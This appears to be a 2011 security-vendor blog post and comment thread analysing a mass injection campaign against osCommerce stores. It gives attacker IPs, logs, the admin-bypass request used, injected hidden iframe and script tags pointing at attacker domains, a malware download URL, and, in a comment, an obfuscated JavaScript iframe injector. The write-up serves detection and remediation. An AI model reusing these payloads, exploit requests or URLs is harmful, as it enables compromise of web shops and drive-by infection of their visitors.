(Initial post: July 24th)
(Updated: July 30th with new infection number, source IP of attack, log entries, osCommerce vulnerabilities used, and more)
(Updated: Aug 3rd with new video and new infection count: >6 million)
(Updated: Aug 8th with new infection count: >8 million)
1. Summary
2. Attack Timeline
3. Source of Attack
4. Vulnerabilities Targeted
5. What Happens to Affected Websites
6. Remediation
7. Infection Details
8. Screenshots
[1. Summary]
1. Number of infections:
As of Aug 3rd, Google shows more than 7,690,000 (willysy) + 629,000 (exero) = 8.3 million infected pages. Note this number is for individual infected pages, not sites or domains.
2. Injected iframe:
initially it was:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>Later it became:
<script src=http://exero.eu/catalog/jquery.js></script>
3. Attacker:
Ukraine IPs: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214 (all AS47694). Agent string: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
4. Target and website vulnerability:
osCommerce sites, using at least the following vulnerabilities: osCommerce Remote Edit Site Info Vulnerability, osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability, and Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass.
5. Browser exploits used:
CVE-2010-0840 -- Java Trust
CVE-2010-0188 –- PDF LibTiff
CVE-2010-0886 -– Java SMB
CVE-2006-0003 -– IE MDAC
CVE-2010-1885 – HCP
6. Exploit domain:
arhyv.ru, counv.ru
Date of registration: July 20th
Registered by: leshkinaira@yahoo.com
IP: 46.16.240.18 (AS51632 Ukrain - Inet Ltd)
Related domains: xlamv.ru, vntum.ru
7. Malware URL:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot
[2. Attack Timeline]
July 10th -- "Angel Injection" write about "osCommerce Remote Edit Site Info Vulnerability" (here, here).
July 11th -- Attacker group starts to test exploitation.
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com/admin/configuration.php/login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
July 20th -- Attacker registers the exploit domains arhyv.ru and counv.ru, using email: leshkinaira@yahoo.com
July 23rd -- Attack launched injects the "Store Name" variable:
178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
Injected iframes pointed to two domains,
initially:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>and later:
<script src=http://exero.eu/catalog/jquery.js></script>
July 24rd -- Initial writeup of this report, at the time there was only 90,000 infected pages:
July 31th -- Google shows more than 3,410,000 (willysy) + 386,000 (exero) = 3.8 million infected pages.
Bing, on the other hand, shows 1.8 million infected pages for willysy:
Aug 3rd -- Google shows more than 5,820,000 (willysy) + 497,000 (exero) = 6.3 million infected pages
Aug 7th -- Google shows more than 7,690,000 (willysy) + 629,000 (exero) = 8.3 million infected pages.
Several IPs have been identified: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214, all of which belong to AS47694. These IPs should be located in Ukraine, and belongs to the ISP www.didan.com.ua.
The attackers used the following agent string:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
If you have logs or know other IPs that you can share, please send them to Wayne at email: wayne@armorize.com.
[4. Vulnerabilities Targeted]
This attack targets osCommerce websites and leverages several osCommerce vulnerabilities, including osCommerce Remote Edit Site Info Vulnerability, disclosed July 10th, 2011, osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability, disclosed May 14, 2011, and Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass, disclosed May 30, 2010.
Below are some sample log entries:
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:07 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 21883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.71 - - [23/Jul/2011:19:55:37 -0500] "GET /admin/configuration.php/login.php?cID=1&action=edit HTTP/1.1" 200 25014 "http://__Masked__by_armorize.com/admin/configuration.php?cID=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
[5. What Happens to Affected Websites]
1. The "Store Name" variable of osCommerce sites will be modified to inject one of the iframes below:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>2. For certain websites the attacker also leaves at least one (sometimes more) backdoors, or "webshells". This happens more especially for shared hosting accounts where the backdoor allows for access to multiple accounts on the same server:
[6. Remediation]
Below is our best attempt to describe the remediation procedures. If you have questions or would like us to do it for you please contact wayne@armorize.com.
1. Know if you've been infected.
1.1 Search your logs for:
1.1.1 Access from IPs: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214.
1.1.2 Access with agent string: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
1.2 Search your site for the existence of two iframes:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
1.3 Or just have HackAlert find everything for you. We know it's good because we built it ;) (greetings Dave, borrowed your quote)
2. Install an anti-virus program on the computer you use to manage your website.
3. Find and remove the injected backdoors.
4. Find and remove the injected iframes / javascripts
5. Secure your osCommerce installation. Upgrade to the latest version and use .htaccess to protect admin directories.
6. Change your website hosting and your osCommerce admin passwords
A very good article on how to secure osCommerce can be found here (thanks Markus):
http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/
And the latest version of osCommerce can be downloaded here:
http://www.oscommerce.com/solutions/downloads
[7. Infection Details]
Here's the original youtube video we made of the entire infection process; at the time there were only 90,000 infected pages.
And here's the new one we made when there's over 6 million infected pages:
1. Infected website is injected with one of the following scripts:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
2. Browser loads http://willysy.com/images/banners/, redirected (302) to http://papucky.eu/ext/
3. Contents of papucky.eu/ext/ is here on pastebin, loads javascript from http://gooqlepics.com/include.js?in=864
4. javascript here on pastebin, decodes to this, generates iframe pointing to:
http://yandekapi.com/api?in=864
5. Contents of http://yandekapi.com/api?in=864 is here, redirects to: http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV
6. Contents of http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV is here, decodes to this. This includes multiple browser exploits.
7. After successful exploitation, browser downloads and executes malware from here:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot
[8. Screenshots]
Vulnerable osCommerce installations allows modification of the site's variables without admin access:
Share this: | 
|
Posts
49 comments:
Thank you very much for your information.
How do I fix this malware?
I have found some unusual *.php file in catalog/image and delete them all.
But it still keep changing my store name
Sorry for the trivial question.
What is the process monitor used in the screencast ?
With Sysinternals one or with Yet Another (remote) was not able to get this interessing window.
When I click this pastebin : http://pastebin.com/jAPCwSz8 ESET moans at me. Will the code contained in this pastebin execute just by clicking on the link? I wanted to see exactly what it does but I don't wanna get infected.
@Kafeine the process monitor is called process monitor. The title bar of the application gives it away.
Usually the titlebar of an application will tell you exactly what the app is.
@Kafeine The shortcut on the desktop is also an indication of what the program is called. It's literally called "process monitor."
WHere you find this Process Monitor ?
If you look for it you only find the Sysinternals one and Yet Another Remote Process Monitor (which icon is not far from this one)
Thank you for sharing your observations!
I am sorry for the potentialy dumb question but...do you have details on the infection process on the server-side? How was the iframe injected on the website?
My website is affected too. How to resolve this problem?
It looks like they somehow get access to database (most probably through the admin page) and modify the STORE_NAME key in configuration table. Remove the iframe code from the value and it's fixed.
Hi Henry, I kept removing that but the store name keep changing. No matter how many times I change my password....:-(
@Kafeine about the Process Monitor, look here:
http://www.brothersoft.com/process-monitor-163749.html
Many Thanks ! :)
Cleaner Link.
It's from BlueOrb
http://www.blueorbsoft.com/ProcessMonitor/index.html
In reference to removing iframe code from STORE_NAME configuration value. If you remove the code and it's coming back this could mean you're under active attack. I also noticed I had few strange administrator accounts that I know I didn't set up. Naturally removed them.
I suspect the attack somehow happens through the admin page so I blocked the access to the admin page entirely, with exception of specific IP addresses. This can be done with htaccess file inside the admin directory. For example adding below to htaccess file will block all access except from a specific IP address (this would be your IP, also this supports multiple “Allow from” definitions if you access admin page from more than one location like home and office).
Order deny,allow
Deny from all
Allow from YOUR_IP
This however will not work well when your IP address changes often but it's better than getting hacked. The best fix is probably to upgrade to the latest osCommerce release but it's not so easy in my case as I made tons of changes to original code to support what I needed. Take a look if interested
(podatekdochodowy.com or amigolife.com)
Cool sites. Looks like you have put a lot of effort into it
A simple question, how are these websites injected with this malicious code?
what does the update.exe do?
Hi henry, thanks for your suggestion. Have put in place a security check, hopefully it works...
And for those who use GNU / Linux is secure? or only affects the Windows platform?
greetings to all.
Alessandro simon.
Hi guys, there's been more than 1 million infected pages by now, and so we've updated the original post, adding to it the infection number (1,273,000), source IP of attack, log entries, osCommerce vulnerabilities used, and more. Thanks!
Good write up on this ongoing exploit. One thing though - if you are going to mask a URL in a screenshot - mask it in the browser tab too.
;-)
@Chris: it's nice that you grey out the URLs in your browser screenshots, but please grey out the URL in browser tab also ;) (have a look at your Chrome screenshot with file manager)
@Chris: also in your screenshot of vintagesleazes.com's admin panel of osCommerce. There is a mail address shown in screenshot. So it's not difficult to guess the shops URL. Please grey it out ;)
LOL. You forgot to anon the tab with the sites name in point 5.
New suspicious URL
hxxp://tiasissi[.]com[.]br/revendedores/jquery/>
Thanks for a great post.
I have a few follow up questions.
How does the virus find the osCommerce sites?
We have a lot of hackers coming back trying the same non-existant file in the admin folder. But it seems to be machines not real hackers. Maybe infected computers or servers. Is this the virus trying to find more osCommerce sites?
Thanks and keep up the good work!
The biggest problem we face is that companys want to run e-commerce sites on a shoe string. When we mention backups and updates they do not seem to care.
Slowly the more attacks that get highlighted the more people will listen.
This blog is excellent. Keep up the good work.
They're now obfuscating the code. Our website was just hit, and they appended this:
["script" tag here, removed as it was rejected by this comment box]ti='.c';ai='af';qo='p';jn='htm';rf='n';tf='doz';yn='ifr';xm='s';cl='o';jd='k9';nn='tv.';rl='85y';r='umu';eh='m/';ec='htt';sb='rc';f='ame';l='://';b=yn.concat(f);gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute('width','1');xp.setAttribute('height','1');xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);[end /script tag]
["script" tag here, removed as it was rejected by this comment box]wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute('width','1');ip.setAttribute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);[end /script tag]
Which expands to http://zirycatum.com/k985ytv.htm
( zirycatum.com resolves to 178.17.163.92 )
Thanks! The incident involving that k985ytv.htm URL is documented here: http://blog.armorize.com/2011/08/k985ytvhtm-fake-antivirus-mass.html
3 different break-in attempts on my OSCommerce site (unsuccessful however on my site) from other IP's than listed above:
174.143.11.196
31.41.10.135
178.217.160.133
Thank you Chameleon!
Yes, there are several crawlers crawling for osCommerce sites on a regular basis. A fat list of known osCommerce sites can be downloaded easily and has been updated regularly. There's also a osCommerce defacer that takes this list as input and starts to deface osCommerce sites.
Thank you will correct it
Ha!
The malware infects only Windows machines. The injection will work on osCommerce installations regardless of the underlying operating system.
By leveraging osCommerce vulnerabilities mentioned in the post.
Indeed not easy to upgrade, and thanks for the info!
Yes this is the one. Simpler than the Process Monitor from SysInternals (MS) and therefore makes a better demo.
Best is to upgrade your osCommerce to the latest version
No, you won't get infected by visiting http://pastebin.com/jAPCwSz8
Many antivirus just do simple regex and therefore...
Best that you upgrade to the latest version of osCommerce.
I am joyous to
hold this accruement rattling recyclable for me, as it contains lot of
message. I always advanced to demonstrate the valuation noesis and this event
I recovered in you communicator. Thanks for copulation
awesome share. thank you very much.
The best fix I have found so far is with the addon called osC_Sec
http://addons.oscommerce.com/info/7834
http://vintagesleaze.com/admin/configuration.php
is still vulnerable!!!!!!
hi, we're running OsCom 2.2 on Windows ISS server.... and being attacked several time in the alst 2 months... Any recomendation ?? orientation ??
thanks
Rodigo
This is a brilliant post, im really glad I found it thank you very much.
Very interesting article. I've always been interested in knowing more about this.
is still vulnerable!!!!!!
Post a Comment